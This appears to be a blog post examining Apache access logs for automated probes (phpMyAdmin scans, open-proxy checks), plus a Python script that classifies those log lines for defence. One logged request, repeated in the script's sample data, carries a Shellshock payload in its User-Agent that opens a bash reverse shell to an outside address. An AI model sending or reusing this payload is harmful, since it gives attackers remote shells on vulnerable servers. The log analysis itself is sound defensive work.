Friday, 31 October 2014

ShellShock et alii

A few more curiosities from the logs of an Apache 2 server.

There are clearly attempts by automated scripts looking for phpMyAdmin-related vulnerabilities (in yellow) and a Shellshock-based attack (in red) hoping to find cPanel installed.

The lines in green are curious, though: they are requests for services such as proxyjudge, which check the state of proxy servers (perhaps a way of checking whether the machine is sitting behind a proxy?).

In any case, as can be seen, the server's responses are in the 400 class, so the file was not found.

Also interesting is the line in light blue, where a request is made that does not belong to the HTTP protocol.

Finally, the countries the attacks originate from: in some cases Taiwan, in others Thailand,

08.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /ujuj/uju/uj.php HTTP/1.1" 404 470 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
85.25.72.86 - - [29/Oct/2014:23:30:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
125.64.35.67 - - [30/Oct/2014:00:03:13 +0000] "GET http://6.url.cn/zc/chs/img/body.png HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.3072; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)"
61.58.204.97 - - [30/Oct/2014:00:42:07 +0000] "GET /hghg/hgh/hg.php HTTP/1.1" 404 470 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:08 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:09 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:10 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:50 +0000] "GET /kkkk/kkk/kk.php HTTP/1.1" 404 470 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:51 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:29 +0000] "GET /asas/asa/as.php HTTP/1.1" 404 470 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
64.4.97.21 - - [30/Oct/2014:06:37:26 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"

218.59.238.93 - - [30/Oct/2014:11:01:52 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [30/Oct/2014:11:02:14 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


124.122.165.64 - - [30/Oct/2014:08:53:09 +0000] "GET /vyvy/vyv/vy.php HTTP/1.1" 404 470 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:12 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"

218.59.238.93 - - [29/Oct/2014:16:19:29 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


218.59.238.93 - - [29/Oct/2014:10:07:33 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:39:54 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:12:40 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:13:49 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

221.165.35.130 - - [27/Oct/2014:23:25:57 +0000] "GET / HTTP/1.1" 200 11820 "-" "-"
65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"
218.59.238.93 - - [27/Oct/2014:23:46:01 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:48:51 +0000] "GET http://yazoodle.net/azenv.php HTTP/1.0" 404 463 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:57:38 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /zyzy/zyz/zy.php HTTP/1.1" 404 470 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [28/Oct/2014:01:36:04 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:01:49:47 +0000] "GET http://www.mesregies.com/azz.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:02:50:52 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:03:51:04 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
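The excerpt above can be triaged automatically. The following is an added example, not code from the post: a small Python parser for Apache's combined log format that classifies each line into the families the post points out (the phpMyAdmin setup.php sweep, the "() {" Shellshock marker in a header, absolute-URI and CONNECT requests used to test for an open proxy, and requests Apache rejected with a 400) and counts them per source address. The category names and the regular expression for the random /abab/aba/ab.php path that precedes every phpMyAdmin sweep in the excerpt are my own; the sample lines are copied from the log shown above.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Signatures derived from the excerpt in the post (names are my own choice)
PMA_SETUP_RE = re.compile(r'^/(phpMyAdmin|pma|myadmin)/scripts/setup\.php$', re.IGNORECASE)
RANDOM_PATH_RE = re.compile(r'^/([a-z]{2})\1/\1[a-z]/\1\.php$')   # /ujuj/uju/uj.php style
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')                          # "() {" inside a header value
ABSOLUTE_URI_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)  # GET http://host/... via us


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    entry = m.groupdict()
    # "%r" is "METHOD TARGET PROTOCOL"; pad so a truncated request still unpacks
    entry["method"], entry["target"], entry["proto"] = (entry["request"].split() + ["", "", ""])[:3]
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def classify(entry):
    """Map one parsed entry to a category; the first matching rule wins."""
    if SHELLSHOCK_RE.search(entry["agent"]) or SHELLSHOCK_RE.search(entry["referer"]):
        return "shellshock"
    if PMA_SETUP_RE.match(entry["target"]):
        return "phpmyadmin_probe"
    if RANDOM_PATH_RE.match(entry["target"]):
        return "random_path_probe"
    if entry["method"] == "CONNECT" or ABSOLUTE_URI_RE.match(entry["target"]):
        return "open_proxy_probe"
    if entry["status"] == 400:
        return "rejected_request"
    return "ordinary"


def summarize(lines):
    """Per source IP, count how many requests fell into each category."""
    per_ip = defaultdict(Counter)
    for line in lines:
        entry = parse_line(line)
        if entry is not None:
            per_ip[entry["ip"]][classify(entry)] += 1
    return per_ip


def proxy_probes_answered_200(lines, local_root_size):
    """Proxy probes that received a 200. The third tuple field is True when the byte
    count equals the server's own root page, i.e. Apache most likely served its local
    index rather than fetching the remote URL on the client's behalf."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and classify(entry) == "open_proxy_probe" and entry["status"] == 200:
            hits.append((entry["ip"], entry["target"], entry["size"] == local_root_size))
    return hits


# Sample input: lines copied from the excerpt in the post
SAMPLE_LOG = """\
108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
85.25.72.86 - - [29/Oct/2014:23:30:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:07 +0000] "GET /hghg/hgh/hg.php HTTP/1.1" 404 470 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:08 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:09 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:10 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"
64.4.97.21 - - [30/Oct/2014:06:37:26 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:07:33 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"
""".splitlines()


if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, dict(counts))
    # 11783 bytes is what "GET / HTTP/1.0" returned in the excerpt
    print(proxy_probes_answered_200(SAMPLE_LOG, 11783))
```

The last function addresses the one place where a 200 rather than a 404 shows up: the requests for http://proxyjudge.us/ got a 200 with 11783 bytes, exactly the size of the server's own "GET / HTTP/1.0" response in the same excerpt, which suggests Apache answered with its local index page rather than acting as a forward proxy. Comparing that byte count is a quicker check than eyeballing each line, and the same per-IP counters are what you would feed a fail2ban-style rule or a ticket.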